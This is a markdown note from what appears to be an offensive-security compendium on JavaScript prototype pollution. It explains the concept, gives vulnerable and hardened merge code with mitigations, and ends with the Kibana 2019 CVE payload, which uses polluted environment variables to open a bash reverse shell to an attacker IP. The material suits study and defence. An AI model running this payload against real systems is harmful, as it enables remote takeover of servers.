killchain-compendium/Exploits/Web/Prototype Pollution JS.md

# Prototype Pollution

Prototype pollution overwrites built-in properties of an object's prototype, such as `constructor` or `toString`.

Every plain object inherits its properties from `Object.prototype` (reachable from any instance as `obj.__proto__`). `toString()` is inherited by all objects, so if `toString()` is overwritten on the prototype, the change shows up in every other object as well.

## Usage

The prototype can be reached from inside any object; the two expressions below refer to the same object:

```
obj.__proto__
Object.prototype
```

Create an object:

```
let obj = {}
```

Create properties inside `__proto__`; they become visible on every other object:

```
obj.__proto__.isAdmin = true
```
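The following JavaScript is an added illustration, not part of the compendium note: it shows how a typical recursive merge of attacker-controlled JSON (a request body, for instance) reaches `Object.prototype` through a `__proto__` key and sets the `isAdmin` flag described above on every object, and puts a hardened merge beside it. All names and inputs here (`unsafeMerge`, `safeMerge`, `MALICIOUS_JSON`, the demo helpers) are constructed for the example.

```javascript
// Added example (not from the compendium): a recursive merge that pollutes
// Object.prototype, and a hardened version. Every input is constructed.

// Vulnerable: for-in enumerates an own "__proto__" key produced by JSON.parse,
// and target["__proto__"] resolves to Object.prototype, so the recursion
// writes isAdmin onto the shared prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Hardened: refuses keys that reach the prototype chain and only descends
// into properties the target actually owns.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue; // or throw, if you want to log the attempt
    const value = source[key];
    if (isPlainObject(value)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker-controlled input (e.g. a JSON request body).
const MALICIOUS_JSON = '{"name":"guest","__proto__":{"isAdmin":true}}';

// Runs the vulnerable merge, checks whether an unrelated object became
// "admin", then removes the pollution so the process stays usable.
function demoUnsafe() {
  const victim = {}; // created before the merge, never touched directly
  unsafeMerge({}, JSON.parse(MALICIOUS_JSON));
  const polluted = victim.isAdmin === true;       // inherited from the prototype
  const ownOnVictim = hasOwn(victim, 'isAdmin');  // false: it is not an own property
  delete Object.prototype.isAdmin;                // cleanup
  return { polluted, ownOnVictim };
}

// Same input through the hardened merge: the flag never reaches the prototype.
function demoSafe() {
  const victim = {};
  const merged = safeMerge({}, JSON.parse(MALICIOUS_JSON));
  return {
    polluted: victim.isAdmin === true,
    name: merged.name,
    hasOwnProto: hasOwn(merged, '__proto__'),
  };
}

// Cheap runtime canary: built-in prototype members are non-enumerable, so any
// enumerable key on Object.prototype is a sign of pollution.
function prototypeIsClean() {
  return Object.keys(Object.prototype).length === 0;
}
```

Beyond filtering keys, two further mitigations are worth knowing: `Object.freeze(Object.prototype)` at startup makes the write fail outright (it is irreversible, which is why the demo does not do it), and storing untrusted key/value data in `Object.create(null)` maps or `Map` removes the prototype chain altogether. The `prototypeIsClean()` canary is a quick health check a service can run after handling untrusted input.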

## Kibana CVE 2019

A concrete example is the Kibana prototype pollution CVE from 2019. The payload writes a reverse bash shell into environment variables through the polluted prototype. It uses the following Node functions:

- require
- eval

```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```